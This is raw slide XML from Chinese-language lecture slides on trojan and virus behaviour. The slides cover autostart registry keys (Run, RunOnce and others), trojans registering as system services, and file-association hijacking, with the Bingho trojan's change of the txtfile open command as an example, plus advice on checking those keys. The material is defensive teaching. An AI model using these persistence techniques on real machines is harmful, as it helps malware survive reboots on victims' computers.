              <a:t>等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>HKEY_CURRENT_USER\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Runonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunonceEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunServices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunServicesOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>HKEY_USERS\[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>UserSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>]\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Runonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunonceEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunServices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RunServicesOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="圆角矩形标注 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3834581" y="3657600"/>
            <a:ext cx="5309419" cy="2418735"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45698"/>
              <a:gd name="adj2" fmla="val -63720"/>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sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>在上述主键中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Runonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>主键设置的自启动程序将在下一次系统启动时获得自动运行的机会，并在运行后从该主键移除。木马程序如果利用这个主键进行自启动，则木马的运行通常有一个固定的操作，即需要在运行后重新将自身加入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Runonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>主键中，确保自己在每次系统启动时均获得运行机会</a:t>
            </a:r>
          </a:p>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dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>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1627381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ltLang="zh-CN" dirty="0"/>
              <a:t>(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 添加系统服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658813" y="1344613"/>
            <a:ext cx="7772400" cy="4722812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>Windows NT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>内核操作系统都大量使用服务来实现关键的系统功能。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>一些木马将自身注册为系统服务，并将相应服务设置为系统开机时自启动。例如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Resource Kit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>工具包（其中包含的工具可能会根据用户使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>版本而有所不同）中的程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>instsrv.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>常常被木马用来创建系统服务，服务的管理和配置可以通过程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>sc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>来实施。这样每当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>系统启动时，即使没有用户登录，木马也会自动开始工作。作为服务启动的木马往往隐蔽性更强，一般用户很难从服务中找出木马程序</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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237C980-F831-4993-B2E1-7D34564B240B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838696" y="1341620"/>
            <a:ext cx="7772400" cy="4804348"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>几个典型特性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传染性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>潜伏性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可触发性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>寄生性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>非授权执行性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>破坏性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1429ADAD-F05B-4DC7-B2F2-BDEBE57FF7F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机病毒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20861720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7" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改文件打开关联属性</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69638" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390143" y="1259380"/>
            <a:ext cx="8137525" cy="5141420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>通常对于一些常用的文件如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>文件，只要双击文件图标就能打开这个文件。这是因为在系统注册表中，已经把这类文件与某个程序关联起来，只要用户双击该类文件，系统就自动启动相关联的程序来打开文件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>修改文件打开关联属性是木马程序的常用手段。比如：正常情况下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件的打开方式为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>notepad.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件，而木马可能将这类文件的关联程序修改为木马程序，这样只要打开此类文件，就能在无意中启动木马。案例：冰河木马。</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1" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例：冰河的自动加载方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70662" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1406525"/>
            <a:ext cx="8351837" cy="4565650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HKEY_CLASSES_ROOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>根键中记录的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>操作系统中所有数据文件的信息，主要记录不同文件的文件名后缀和与之对应的应用程序。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>冰河</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>就是通过修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HKEY_CLASSES_ROOT\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>txtfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>\shell\open\command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>下的键值，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>C:\WINDOWS\NOTEPAD.EXE %1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>C:\WINDOWS\SYSTEM\SYSEXPLR.EXE %1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，这样一旦你双击一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>TXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件，原本应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Notepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>打开该文件的，现在却变成启动木马程序了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>　　　　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不同版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统的键名有差异！</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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改文件打开关联</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71686" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479151" y="1399135"/>
            <a:ext cx="8322933" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>不仅仅是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>TXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>文件，其它诸如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>HTM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>ZIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>RAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>等都是木马的目标。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>对付这类木马，只能经常检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>HKEY_CLASSES_ROOT\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>文件类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>\shell\open\command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>主键，查看其键值是否正常。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71687" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
